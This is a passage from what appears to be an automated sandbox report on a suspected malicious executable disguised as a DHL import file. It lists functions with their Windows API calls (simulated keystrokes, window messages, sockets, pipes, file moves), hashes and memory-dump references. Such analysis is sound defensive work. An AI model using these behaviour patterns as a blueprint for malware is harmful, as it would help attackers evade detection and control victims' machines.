Opcode ID: 0faefc00dffeff61f4fed27b5bb415e8a79c7e92744fb3cdf1260caedff10dfc
Instruction ID: 5974e1d16a07a77c1e79ea05ff9cebc3676ad0dda106ad203e83b03caa9d0b9e
Opcode Fuzzy Hash: 0faefc00dffeff61f4fed27b5bb415e8a79c7e92744fb3cdf1260caedff10dfc
Instruction Fuzzy Hash: BD912575900609AFDB00DF95C8A5BBEBFB5FF44316F10442AED00EB291D778A949CB98

Function 004F948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 3d41a284e5646f91c7061e0f1c811ea2623bd38d51c8c53c991e380214c0e5ea
Instruction ID: e0a71d911c8080bcc370617f46ab40cb1c7dd0571b103b235f6dd3b315b5409d
Opcode Fuzzy Hash: 3d41a284e5646f91c7061e0f1c811ea2623bd38d51c8c53c991e380214c0e5ea
Instruction Fuzzy Hash: CA912671D00219AFCB14CFA9C884AEEBBB8FF49320F14455AE615B7251D378AD42DB64

Function 00563947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0056396B
CharUpperBuffW.USER32(?,?), ref: 00563A7A
_wcslen.LIBCMT ref: 00563A8A
VariantClear.OLEAUT32(?), ref: 00563C1F

Part of subcall function 00550CDF: VariantInit.OLEAUT32(00000000), ref: 00550D1F
Part of subcall function 00550CDF: VariantCopy.OLEAUT32(?,?), ref: 00550D28
Part of subcall function 00550CDF: VariantClear.OLEAUT32(?), ref: 00550D34

Strings

Incorrect Parameter format, xrefs: 005639A6, 00563BA1
AUTOIT.ERROR, xrefs: 00563A80, 00563A85

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: b6f7212fe7cc0edb2890cfc5278ed519c69c73c14e2731b1e2049ea321f621fa
Instruction ID: e638bb09b48cae3137f5d1b709ada422059379fcaaae224dd0c6da1641d29268
Opcode Fuzzy Hash: b6f7212fe7cc0edb2890cfc5278ed519c69c73c14e2731b1e2049ea321f621fa
Instruction Fuzzy Hash: 529157746083459FC700EF25C48596ABBE5FF89318F14896EF88A97351DB30EE45CB82

Function 00564BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0054000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?,?,?,0054035E), ref: 0054002B
Part of subcall function 0054000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?,?), ref: 00540046
Part of subcall function 0054000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?,?), ref: 00540054
Part of subcall function 0054000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0053FF41,80070057,?), ref: 00540064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00564C51
_wcslen.LIBCMT ref: 00564D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00564DCF
CoTaskMemFree.OLE32(?), ref: 00564DDA

Strings

NULL Pointer assignment, xrefs: 00564E23, 00564E52

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: c0903d0ddbe95c634f4cc49ee60cc585a00da067225e3871113734333b8c2903
Instruction ID: 77d9429e3cca340ab9769e8b9d75c2a2e90d0f6c5273290f82ef65501c330844
Opcode Fuzzy Hash: c0903d0ddbe95c634f4cc49ee60cc585a00da067225e3871113734333b8c2903
Instruction Fuzzy Hash: 43914871D0021DAFDF10DFA5C881AEEBBB8BF48304F10856AE919A7291DB349E44CF61

Function 005720FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00572183
GetMenuItemCount.USER32(00000000), ref: 005721B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 005721DD
_wcslen.LIBCMT ref: 00572213
GetMenuItemID.USER32(?,?), ref: 0057224D
GetSubMenu.USER32(?,?), ref: 0057225B

Part of subcall function 00543A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00543A57
Part of subcall function 00543A3D: GetCurrentThreadId.KERNEL32 ref: 00543A5E
Part of subcall function 00543A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005425B3), ref: 00543A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005722E3

Part of subcall function 0054E97B: Sleep.KERNEL32 ref: 0054E9F3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 7007df3f9a7373fb17804cc947cda85d689416e4cf79ff476f64c12c97847f7a
Instruction ID: 0cf30900500e64b6a38caf8040b6b33b4f258c2e023da5b86ed2f4136cdbb699
Opcode Fuzzy Hash: 7007df3f9a7373fb17804cc947cda85d689416e4cf79ff476f64c12c97847f7a
Instruction Fuzzy Hash: 3971A075A00205AFCB10DF65D885AAEBBF1FF88314F148459E85AEB352D734EE41DB90

Function 0054AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0054AEF9
GetKeyboardState.USER32(?), ref: 0054AF0E
SetKeyboardState.USER32(?), ref: 0054AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0054AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0054AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0054AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0054B020

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 2c0e555a76259cba40cc2aa8fcd6bd2c7a2d25436b73bbb3b8585c5aa91d56d7
Instruction ID: 7769140b93bd30becc3eec430f6d42f46b02dc94b73ec239431cdb36da5f4204
Opcode Fuzzy Hash: 2c0e555a76259cba40cc2aa8fcd6bd2c7a2d25436b73bbb3b8585c5aa91d56d7
Instruction Fuzzy Hash: 9651B2B06447D53DFB3682388849BFB7EA96B06308F088589E1E9554C3D3D8EDD8D751

Function 0054ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0054AD19
GetKeyboardState.USER32(?), ref: 0054AD2E
SetKeyboardState.USER32(?), ref: 0054AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0054ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0054ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0054AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0054AE38

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 48eadfb8439a6a78a6e7d83cf1a6f64ae43ce8df360d348e2829c87229ed2d91
Instruction ID: a070a8de3f23dc17001b3a72a4dc96624f5d35acdeca9250504531f2eae12b2f
Opcode Fuzzy Hash: 48eadfb8439a6a78a6e7d83cf1a6f64ae43ce8df360d348e2829c87229ed2d91
Instruction Fuzzy Hash: 8C51D6B19887D53DFB3783348C95BFA7E987B45308F088488E1E54A8C2D294ED98E752

Function 0051542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00523CD6,?,?,?,?,?,?,?,?,00515BA3,?,?,00523CD6,?,?), ref: 00515470
__fassign.LIBCMT ref: 005154EB
__fassign.LIBCMT ref: 00515506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00523CD6,00000005,00000000,00000000), ref: 0051552C
WriteFile.KERNEL32(?,00523CD6,00000000,00515BA3,00000000,?,?,?,?,?,?,?,?,?,00515BA3,?), ref: 0051554B
WriteFile.KERNEL32(?,?,00000001,00515BA3,00000000,?,?,?,?,?,?,?,?,?,00515BA3,?), ref: 00515584

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 7a818112a95923c25942dac1b62a90b128ebcee9032a05dbb91afa599b37aa62
Instruction ID: 172892c2aaf31a3c42278c6240398b301a8fdb817d580f49f439801e4b894ea6
Opcode Fuzzy Hash: 7a818112a95923c25942dac1b62a90b128ebcee9032a05dbb91afa599b37aa62
Instruction Fuzzy Hash: 8851B170A00609DFEB10CFA8D845AEEBFFAFF59300F15451AE555E7291E630AA81DB60

Function 005610B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0056304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0056307A
Part of subcall function 0056304E: _wcslen.LIBCMT ref: 0056309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00561112
WSAGetLastError.WSOCK32 ref: 00561121
WSAGetLastError.WSOCK32 ref: 005611C9
closesocket.WSOCK32(00000000), ref: 005611F9

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 0eeebf8ba8de797d7d90df43450852c974012f849dc484a98f7f794bdf18ea83
Instruction ID: 5aa295cebfeaf973fccabc038116486d0702d577f6ef132ecb11e45ee27f0a6a
Opcode Fuzzy Hash: 0eeebf8ba8de797d7d90df43450852c974012f849dc484a98f7f794bdf18ea83
Instruction Fuzzy Hash: 84411631600604AFDB109F14D884BB9BFE9FF46328F18815DF91A9B291C774AD85CBE5

Function 0054CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0054DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0054CF22,?), ref: 0054DDFD

Part of subcall function 0054DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0054CF22,?), ref: 0054DE16

lstrcmpiW.KERNEL32(?,?), ref: 0054CF45
MoveFileW.KERNEL32(?,?), ref: 0054CF7F
_wcslen.LIBCMT ref: 0054D005
_wcslen.LIBCMT ref: 0054D01B
SHFileOperationW.SHELL32(?), ref: 0054D061

Strings

\*.*, xrefs: 0054CFF3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 830c05672449f306876bbb126337b5bf87824cc1e84382e2f1325eb46916adfd
Instruction ID: 940d56061026f1c9b402c35efbdd18f29bff752a200210d93620c59a7f21b39f
Opcode Fuzzy Hash: 830c05672449f306876bbb126337b5bf87824cc1e84382e2f1325eb46916adfd
Instruction Fuzzy Hash: 784178719452195FDF12EBA4D985ADE7FB8BF44344F0000E6E509E7141EB35A688CB50

Function 00572DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00572E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 00572E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 00572E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00572EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00572EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 00572EF1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00572F0B

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: a833a72dbfa674d09996b913010d1571f4468d50e4574c973e3f3f5a5c15293b
Instruction ID: aa8067df5bdd33fb3142ea3782664ac610169b8b365f5aac6c9fd46810eb80b2
Opcode Fuzzy Hash: a833a72dbfa674d09996b913010d1571f4468d50e4574c973e3f3f5a5c15293b
Instruction Fuzzy Hash: EE3106306041509FDB61CF58EC98F653BE9FBAA710F158168F9489F2B1CB71A884FB41

Function 00547726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00547769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0054778F
SysAllocString.OLEAUT32(00000000), ref: 00547792
SysAllocString.OLEAUT32(?), ref: 005477B0
SysFreeString.OLEAUT32(?), ref: 005477B9
StringFromGUID2.OLE32(?,?,00000028), ref: 005477DE
SysAllocString.OLEAUT32(?), ref: 005477EC

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: d30bc65eb1a257a57de2a2579407112c12ec4aef9e8395bfdd0a3217c651a735
Instruction ID: c513db03dd26f14a0491750bdba417db57c63ffb76eb2d18adfc2bb72920c4ab
Opcode Fuzzy Hash: d30bc65eb1a257a57de2a2579407112c12ec4aef9e8395bfdd0a3217c651a735
Instruction Fuzzy Hash: 8C219C7660421DAFDF10DFA8DC88CFA7BACFB093687408429FA19DB160D7709C8597A4

Function 005477FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00547842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00547868
SysAllocString.OLEAUT32(00000000), ref: 0054786B
SysAllocString.OLEAUT32 ref: 0054788C
SysFreeString.OLEAUT32 ref: 00547895
StringFromGUID2.OLE32(?,?,00000028), ref: 005478AF
SysAllocString.OLEAUT32(?), ref: 005478BD

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: af95e4159a4c9e92978a946efe867ad7501c08ab3598c15ddafd8ec80abed607
Instruction ID: 1fe48b5d487ae8d0d478affafe438dd052cf7c4eb322a0109684ee54e65f0992
Opcode Fuzzy Hash: af95e4159a4c9e92978a946efe867ad7501c08ab3598c15ddafd8ec80abed607
Instruction Fuzzy Hash: B0215E31608208AF9F109FA8DC88DAA7BACFB0D7647108129B915DB2A1D774DC85DB64

Function 005504D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 005504F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0055052E

Strings

nul, xrefs: 00550567

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 5dbb02b785a04cae3f4475d388e3e62a07bc795239aceff2168a6193eefcf7df
Instruction ID: ca4a9e05dc17bb3188b244fed0916eb1ee0fd0e69cc0d308fac57d37344f9aa3
Opcode Fuzzy Hash: 5dbb02b785a04cae3f4475d388e3e62a07bc795239aceff2168a6193eefcf7df
Instruction Fuzzy Hash: 68218D75500305ABDF208F29DC54AAA7FE4BF54726F204A1AFCA1E62E0E7709948DF20

Function 005505A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 005505C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00550601

Strings

nul, xrefs: 00550639

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 29eda0a71991d6bb6607e8249782fff2548f12999302bd31804e8e1a565abdf5
Instruction ID: ca56e12f531cc71c0abd96d38273f6da9c571072b9df618251412705023b2107
Opcode Fuzzy Hash: 29eda0a71991d6bb6607e8249782fff2548f12999302bd31804e8e1a565abdf5
Instruction Fuzzy Hash: EC2192755003069BDB209F69DC14AAA7FE4BF95721F240A1AFCA1E72E0D77099A8DB10

Function 005740AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004E600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004E604C
Part of subcall function 004E600E: GetStockObject.GDI32(00000011), ref: 004E6060
Part of subcall function 004E600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 004E606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00574112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0057411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0057412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00574139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00574145

Strings

Msctls_Progress32, xrefs: 005740E3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 80c5509df09002962bbc4924d1f9695bd0212de02011bf3b3a6fdfd8f6c4ca42
Instruction ID: aa2dceedc98b4af4e057d2e259c97af39bbde45551a5e3de2edd7f1b76d9a7b8
Opcode Fuzzy Hash: 80c5509df09002962bbc4924d1f9695bd0212de02011bf3b3a6fdfd8f6c4ca42
Instruction Fuzzy Hash: F011B2B214021DBEEF119F65DC85EE77F9DFF18798F018111BA18A6050C7729C61EBA4

Function 0051D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0051D7A3: _free.LIBCMT ref: 0051D7CC

_free.LIBCMT ref: 0051D82D

Part of subcall function 005129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000), ref: 005129DE
Part of subcall function 005129C8: GetLastError.KERNEL32(00000000,?,0051D7D1,00000000,00000000,00000000,00000000,?,0051D7F8,00000000,00000007,00000000,?,0051DBF5,00000000,00000000), ref: 005129F0

_free.LIBCMT ref: 0051D838
_free.LIBCMT ref: 0051D843
_free.LIBCMT ref: 0051D897
_free.LIBCMT ref: 0051D8A2
_free.LIBCMT ref: 0051D8AD
_free.LIBCMT ref: 0051D8B8

Memory Dump Source

